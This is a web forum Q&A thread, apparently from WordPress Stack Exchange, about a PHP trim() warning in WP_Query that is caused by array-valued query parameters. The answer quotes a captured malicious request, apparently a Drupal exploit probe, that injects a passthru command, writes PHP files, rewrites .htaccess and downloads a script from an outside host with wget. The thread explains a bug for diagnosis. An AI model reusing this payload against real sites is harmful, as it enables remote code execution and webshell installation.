I am running Wordpress 4.9.5 and occasionally see the following error in my logs.

E_WARNING: trim() expects parameter 1 to be string, array given

The stack trace looks like this, so it's not coming from custom theme code.

in trim called at /var/www/wordpress/html/wp-includes/class-wp-query.php (736)
…::parse_query called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (1621)
…ry::get_posts called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (3230)
in WP_Query::query called at /var/www/wordpress/html/wp-includes/class-wp.php (599)
in WP::query_posts called at /var/www/wordpress/html/wp-includes/class-wp.php (715)
in WP::main called at /var/www/wordpress/html/wp-includes/functions.php (960)
in wp called at /var/www/wordpress/html/wp-blog-header.php (16)
in require called at /var/www/wordpress/html/index.php (17)

Is this a known/unknown Wordpress bug and is there a fix for it?

I am running Wordpress 4.9.5 and occasionally see the following error in my logs.

E_WARNING: trim() expects parameter 1 to be string, array given

The stack trace looks like this, so it's not coming from custom theme code.

in trim called at /var/www/wordpress/html/wp-includes/class-wp-query.php (736)
…::parse_query called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (1621)
…ry::get_posts called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (3230)
in WP_Query::query called at /var/www/wordpress/html/wp-includes/class-wp.php (599)
in WP::query_posts called at /var/www/wordpress/html/wp-includes/class-wp.php (715)
in WP::main called at /var/www/wordpress/html/wp-includes/functions.php (960)
in wp called at /var/www/wordpress/html/wp-blog-header.php (16)
in require called at /var/www/wordpress/html/index.php (17)

Is this a known/unknown Wordpress bug and is there a fix for it?

• wp-query
• functions
• warnings

• Can you elaborate on what you mean by "bad code"? The stack trace is all pointing to core Wordpress code and no custom code of mine (e.g. in my functions.php or theme files) – crmpicco Commented May 24, 2018 at 3:47
• @crmpicco Having the same problem, it's the WordPress core that messes up with certain requests: example/?q=/user/… Try this URL on your domain, should trigger the error. As far as I can tell this is a Drupal hack, but not sure. – iSenne Commented Nov 21, 2018 at 7:16
• @iSenne I'm hoping Wordpress resolve it in a future release. – crmpicco Commented Nov 21, 2018 at 7:17
• @crmpicco can this be reliably replicated on a clean WordPress install with no plugins using a default theme? – Nathan Johnson Commented Nov 21, 2018 at 15:01
• Sometimes it's easier and better to take a step back and simply not comment when you don't have constructive input. – Howdy_McGee ♦ Commented Nov 28, 2018 at 4:56

1 Answer 1

I ran into this today. It's a bug. I filed a bug report here:

https://core.trac.wordpress/ticket/46797

The problem is this line of code:

$qv['name'] = trim( $qv['name'] );

Source: https://github/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

A (malicious) user sends a request that looks like:

GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!'> sites/default/files/vuln.php; echo 'Vuln!!'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'

Such a request makes $qv['name'] an array, not a string.

Needs to be sanitized.